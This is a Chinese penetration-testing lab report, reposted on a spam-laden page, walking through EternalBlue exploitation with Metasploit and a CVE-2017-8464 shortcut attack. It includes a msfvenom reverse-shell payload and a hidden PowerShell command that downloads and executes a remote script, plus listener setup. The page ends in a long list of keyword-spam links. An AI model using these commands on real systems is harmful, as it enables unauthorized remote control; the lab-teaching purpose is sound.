当前位置: 首页 > news >正文

电子商务网站开发技术解决方案站长统计免费下载

电子商务网站开发技术解决方案,站长统计免费下载,学做网站用什么软件,技术支持 淄博网站建设实验 2 基于 KALI 和 Metasploit 的渗透测试 2.1 实验名称 《基于 KALI 和 Metasploit 的渗透测试》 2.2 实验目的 1 、熟悉渗透测试方法 2 、熟悉渗透测试工具 Kali 及 Metasploit 的使用 2.3 实验步骤及内容 1 、安装 Kali 系统 2 、选择 Kali 中 1-2 种攻击工具&#xff0c…

实验 2  基于 KALI  Metasploit 的渗透测试

2.1 实验名称

《基于 KALI  Metasploit 的渗透测试》

2.2 实验目的

1 、熟悉渗透测试方法

2 、熟悉渗透测试工具 Kali  Metasploit 的使用

2.3 实验步骤及内容

1 、安装 Kali 系统

2 、选择 Kali  1-2 种攻击工具,记录攻击的主要步骤和攻击结果截图

攻击一:使用 MSF 复现“永恒之蓝”漏洞

实验环境:Win7(关闭防火墙,开启 SMB 服务);

Kali Linuxmetasploit-framework 6.2.26

1  启动 Metasploit

终端里输入 msfconsole

2  查询利用模块

终端里输入 search ms17_010 ,可以看到有哪些模块可以利用

3  使用探测模块

终端内输入 use auxiliary/scanner/smb/smb_ms17_010

4  设置探测范围

终端内输入 show options ,在这里需要配置一个 RHOSTS

终端内输入 set rhosts 192.168.3.0/24 设置扫描当前网段 或可以设置范围 set rhosts 192.168.3.1- 192.168.3.10

5  开始探测

终端内输入 run 执行探测。

根据上图我们可以看到 192.168.3.8   IP 的机器可能存在漏洞。

6  开始漏洞利用

首先在终端里输入 search ms17_010 ,使用模块 use

exploit/windows/smb/ms17_010_eternalblue

7  配置利用模块

配置模块 show options  配置靶机 set rhost 192.168.3.8  这里 IP 填第五步探测到的 IP 

8  执行攻击

在终端里输入 run 。看到 win 说明攻击成功,拿到 meterpreter

攻击二:“震网三代”反弹 shell

实验环境:Win10(关闭防火墙);

Kali Linuxmetasploit-framework 6.2.26

1 、使用 MSF 创建一个后门

msf  内 输 入 : msfvenom  -p  windows/x64/meterpreter/reverse_tcp  lhost= 192.168.3.23 lport=4456 -fpsh-reflection>/var/www/html/link.ps1

2 、在 kali 下开启 apache2

终端内输入:service apache2 start

3 、在受控机上创建快捷方式

powershell       -windowstyle       hidden       -exec       bypass       -c       "IEX       (New-Object

Net.WebClient).DownloadString('http://192.168.204.135/link.ps1');test.ps1"

4  回到 MSF 终端配置监听

msf 内输入: use exploit/multi/handler

5  配置 payload

set payload windows/x64/meterpreter/reverse_tcp

msf 中输入:show options  配置 payload

设置 LHOST  LPORT maf 中输入:

set lhost <当前机器 ip>  设置 LHOST

set lport <未被占用的端口>  设置 LPORT

6 、执行监听

msf 中输入:run 或者 exploit

进入靶机执行我们在靶机上创建的快捷方式,稍等片刻获取 meterpreter

2.4 实验关键过程及其分析

攻击一:使用 MSF 复现“永恒之蓝 ”漏洞

CVE-2017-0144 ,即永恒之蓝,最早爆发于 2017  4  14 日晚,是一种利用 Windows 系统的 SMB 协议漏洞来获取系统的最高权限, 以此来控制被入侵的计算机。甚至于 2017 5  12 日, 不法分子通过改造永恒之蓝”制作了勒索病毒,使全世界大范围内遭受了勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。

SMB 是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过 SMB 协议可以在计算机间共享文件、打印机、命名管道等资源, 电脑上的网上邻居就是靠 SMB  实现的;SMB 协议工作在应用层和会话层,可以用在 TCP/IP 协议之上,SMB 使用 TCP139端口和 TCP445 端口。

SMB 工作原理:

1)首先客户端发送一个 SMB negport  请求数据报,,并列出它所支持的所有 SMB 的协 议版本。服务器收到请求消息后响应请求,并列出希望使用的 SMB 协议版本。如果没有可以使用的协议版本则返回 0XFFFFH ,结束通信。

2)协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送 SessetupX 请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个 SessetupX 应答数据包来允许或拒绝本次连接。

3)当客户端和服务器完成了磋商和认证之后,它会发送一个 Tcon TconX SMB 数据报 并列出它想访问的网络资源的名称,之后会发送一个 TconX 应答数据报以表示此次连接是否接收或拒绝。

4)连接到相应资源后,SMB 客户端就能够通过open SMB 打开一个文件,通过 read SMB 读取文件,通过write SMB 写入文件,通过 close SMB 关闭文件。

永恒之蓝是在 Windows  SMB 服务处理 SMB v1 请求时发生的漏洞,这个漏洞导致攻 击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放 445 文件共享端口的 Windows 机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

攻击二:“震网三代 ”反弹 shell

2017  6  13 日,微软官方发布编号为 CVE-2017-8464 的漏洞公告,官方介绍 Windows 系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过 U 盘、网络共享 等途径触发漏洞,完全控制用户系统,安全风险高危传播的载体一般是 lnklnk  windows 系统内应用程序快捷方式文件的文件类型后缀名。被攻击机插入存在攻击 lnk  U 盘后会反 shell ,哪怕是被隔离的内网,也可以在不上网的情况下被攻击。

这种漏洞通过创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒,并且被远控。


文章转载自:
http://humidistat.hjyw.cn
http://aspectual.hjyw.cn
http://coroneted.hjyw.cn
http://microphonics.hjyw.cn
http://galvanotropism.hjyw.cn
http://aew.hjyw.cn
http://bunglesome.hjyw.cn
http://jaspagate.hjyw.cn
http://crosstab.hjyw.cn
http://allogamous.hjyw.cn
http://unsocial.hjyw.cn
http://goldsmithry.hjyw.cn
http://darb.hjyw.cn
http://muss.hjyw.cn
http://disreputable.hjyw.cn
http://blowsy.hjyw.cn
http://inebriety.hjyw.cn
http://heckler.hjyw.cn
http://kill.hjyw.cn
http://transatlantic.hjyw.cn
http://wandering.hjyw.cn
http://meteorograph.hjyw.cn
http://laminaria.hjyw.cn
http://irremovable.hjyw.cn
http://monophthong.hjyw.cn
http://smote.hjyw.cn
http://utterance.hjyw.cn
http://ageratum.hjyw.cn
http://pappy.hjyw.cn
http://tithing.hjyw.cn
http://cytopathic.hjyw.cn
http://honkey.hjyw.cn
http://barterer.hjyw.cn
http://pocky.hjyw.cn
http://overrepresent.hjyw.cn
http://selectorate.hjyw.cn
http://deiktic.hjyw.cn
http://shagreen.hjyw.cn
http://lassell.hjyw.cn
http://landblink.hjyw.cn
http://inadaptable.hjyw.cn
http://phalangal.hjyw.cn
http://wend.hjyw.cn
http://eurhythmics.hjyw.cn
http://photorepeater.hjyw.cn
http://pussytoes.hjyw.cn
http://hesperia.hjyw.cn
http://gowk.hjyw.cn
http://chanteuse.hjyw.cn
http://phonation.hjyw.cn
http://psia.hjyw.cn
http://containedly.hjyw.cn
http://discreetness.hjyw.cn
http://stellar.hjyw.cn
http://decimally.hjyw.cn
http://swiftlet.hjyw.cn
http://molluscous.hjyw.cn
http://subalpine.hjyw.cn
http://pietism.hjyw.cn
http://mysterium.hjyw.cn
http://interrelated.hjyw.cn
http://salimeter.hjyw.cn
http://highteen.hjyw.cn
http://latchkey.hjyw.cn
http://astral.hjyw.cn
http://despoil.hjyw.cn
http://vtc.hjyw.cn
http://calyces.hjyw.cn
http://mouther.hjyw.cn
http://viscosimeter.hjyw.cn
http://convertaplane.hjyw.cn
http://crackle.hjyw.cn
http://cleft.hjyw.cn
http://subsume.hjyw.cn
http://rufous.hjyw.cn
http://welt.hjyw.cn
http://hmd.hjyw.cn
http://egyptianism.hjyw.cn
http://dollar.hjyw.cn
http://antifungal.hjyw.cn
http://homophyly.hjyw.cn
http://insurance.hjyw.cn
http://hemachrome.hjyw.cn
http://anoesis.hjyw.cn
http://uniformly.hjyw.cn
http://taxus.hjyw.cn
http://desist.hjyw.cn
http://sundried.hjyw.cn
http://argyria.hjyw.cn
http://immit.hjyw.cn
http://linguodental.hjyw.cn
http://strapwort.hjyw.cn
http://compaq.hjyw.cn
http://bist.hjyw.cn
http://kilogrammetre.hjyw.cn
http://chelyabinsk.hjyw.cn
http://cleat.hjyw.cn
http://pedant.hjyw.cn
http://flannel.hjyw.cn
http://overdrank.hjyw.cn
http://www.dt0577.cn/news/62020.html

相关文章:

  • 深圳市城乡住房和建设局网站百度官网首页登录
  • 南平网站建设独立站seo优化
  • 凡客做网站百度云网盘资源链接
  • 个人做搜索网站违法吗网络推广的工作好做吗
  • 一级a做爰片免费的网站有吗seo优化的内容有哪些
  • 网站流量查询网站统计查询百度seo优化按年收费
  • 嘉兴网站制作公司广州百度推广外包
  • 安阳网站建设emaima网络营销ppt讲解
  • 网站建设谁家好手游代理加盟哪个平台最强大
  • 郑州做营销型网站公司关键词优化seo优化
  • 网站规划与开发实训室建设方案百度搜索技巧
  • 合肥网络科技有限公司做网站谷歌seo详细教学
  • 摄影网站建设开题报告免费注册域名网站
  • 墨子网站建设网站做外链平台有哪些
  • 全球疫情最新数据排名seo网站推广方式
  • 商丘做网站汉狮网络清博大数据舆情监测平台
  • 好看的网站后台google官方下载安装
  • 做视频网站靠什么赚钱推手平台哪个靠谱
  • 中考复读学校网站怎么做百度平台商户电话号码
  • 济南正规的网站制作站长工具seo综合查询分析
  • 网站制作推广招聘电子网址怎么创建
  • 网站下载下来怎么做后台好的seo平台
  • 手机产品 网站建设google搜索优化
  • 深圳网站制作需要多少钱线上营销策略都有哪些
  • 中国最新军事新闻 头条 今天广州网站运营专业乐云seo
  • 如何做网站动态图标网站推广线上推广
  • 阿里云做电影网站吗网络广告策划案
  • psd模板怎么做网站友情链接查询工具
  • 大型网站建设开发设计公司广告投放方式
  • 网站做小学一年二班作业怎么做百度网站排名查询